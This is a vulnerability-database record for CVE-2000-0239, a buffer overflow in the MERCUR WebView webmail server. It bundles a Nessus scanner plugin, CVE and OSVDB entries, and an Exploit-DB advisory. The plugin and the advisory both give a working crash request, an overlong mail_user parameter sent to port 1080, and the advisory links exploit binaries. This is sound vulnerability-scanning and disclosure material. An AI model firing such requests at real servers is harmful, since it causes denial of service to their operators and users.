{"id": "MERCURE_WEBVIEW.NASL", "bulletinFamily": "scanner", "title": "MERCUR WebView WebMail Server mail_user Parameter DoS", "description": "The remote WebView service does not do proper bounds checking when\nprocessing the following request :\n\n GET /mmain.html&mail_user=aaa[...]aaa\n\nA remote attacker could exploit this to crash the service, or\npotentially execute arbitrary code.", "published": "2000-03-15T00:00:00", "modified": "2000-03-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/10346", "reporter": "This script is Copyright (C) 2000-2021 Tenable Network Security, Inc.", "references": ["https://seclists.org/bugtraq/2000/Mar/200"], "cvelist": ["CVE-2000-0239"], "type": "nessus", "lastseen": "2021-01-20T12:07:06", "edition": 25, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2000-0239"]}, {"type": "osvdb", "idList": ["OSVDB:10887"]}, {"type": "exploitdb", "idList": ["EDB-ID:19810"]}], "modified": "2021-01-20T12:07:06", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-01-20T12:07:06", "rev": 2}, "vulnersScore": 6.9}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(10346);\n script_version(\"1.30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2000-0239\");\n script_bugtraq_id(1056);\n\n script_name(english:\"MERCUR WebView WebMail Server mail_user Parameter DoS\");\n script_summary(english:\"Checks for a buffer overflow\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application on the remote host has a buffer overflow\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote WebView service does not do proper bounds checking when\nprocessing the following request :\n\n GET /mmain.html&mail_user=aaa[...]aaa\n\nA remote attacker could exploit this to crash the service, or\npotentially execute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2000/Mar/200\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to the latest version of this software.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2000/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2000/03/15\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_DENIAL);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2000-2021 Tenable Network Security, Inc.\");\n\n script_dependencie(\"http_version.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(1080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = 1080;\n\nif (! get_port_state(port)) exit(0, \"Port \"+port+\" is closed\");\n\nif (http_is_dead(port: port)) exit(0, \"Web server on port \"+port+\" is dead\");\n\nreq2 = string(\"/mmain.html&mail_user=\", crap(2000));\nw = http_send_recv3(port: port, item:req2, method:\"GET\");\nif (isnull(w)) security_hole(port);\n", "naslFamily": "CGI abuses", "pluginID": "10346", "cpe": [], "scheme": null}

{"cve": [{"lastseen": "2021-02-02T05:19:02", "description": "Buffer overflow in the MERCUR WebView WebMail server allows remote attackers to cause a denial of service via a long mail_user parameter in the GET request.", "edition": 4, "cvss3": {}, "published": "2000-03-15T05:00:00", "title": "CVE-2000-0239", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2000-0239"], "modified": "2016-10-18T02:06:00", "cpe": ["cpe:/a:atrium_software:mercur_pop3_server:3.20.01", "cpe:/a:atrium_software:mercur_mailserver:3.2", "cpe:/a:atrium_software:mercur_imap4_server:3.20.01"], "id": "CVE-2000-0239", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0239", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:atrium_software:mercur_imap4_server:3.20.01:*:*:*:*:*:*:*", "cpe:2.3:a:atrium_software:mercur_mailserver:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:atrium_software:mercur_pop3_server:3.20.01:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:06", "bulletinFamily": "software", "cvelist": ["CVE-2000-0239"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2000-03/0160.html\nISS X-Force ID: 4120\n[CVE-2000-0239](https://vulners.com/cve/CVE-2000-0239)\nBugtraq ID: 1056\n", "modified": "2000-03-16T00:00:00", "published": "2000-03-16T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:10887", "id": "OSVDB:10887", "type": "osvdb", "title": "MERCUR WebView WebMail Server mail_user Parameter DoS", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T12:46:56", "description": "Atrium Software Mercur WebView WebMail-Client 1.0 Buffer Overflow. CVE-2000-0239. Dos exploit for windows platform", "published": "2000-03-16T00:00:00", "type": "exploitdb", "title": "Atrium Software Mercur WebView WebMail-Client 1.0 - Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0239"], "modified": "2000-03-16T00:00:00", "id": "EDB-ID:19810", "href": "https://www.exploit-db.com/exploits/19810/", "sourceData": "source: http://www.securityfocus.com/bid/1056/info\r\n\r\nWebView WebMail-Client is an add-on for the Mercur SMTP/POP3/IMAP4 Mail Server which allows a user to access email through a web browser.\r\n\r\nInsufficient boundary checking exists in the code which handles GET requests, specifically on port 1080. Issuing a GET request containing a string of over 1000 characters on port 1080 will cause the WebView WebMail-Client application to crash.\r\n\r\neg.\r\nhttp: //target/&mail_user=<string containing over 1000 characters>\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19810-1.exe\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19810-2.zip", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/19810/"}]}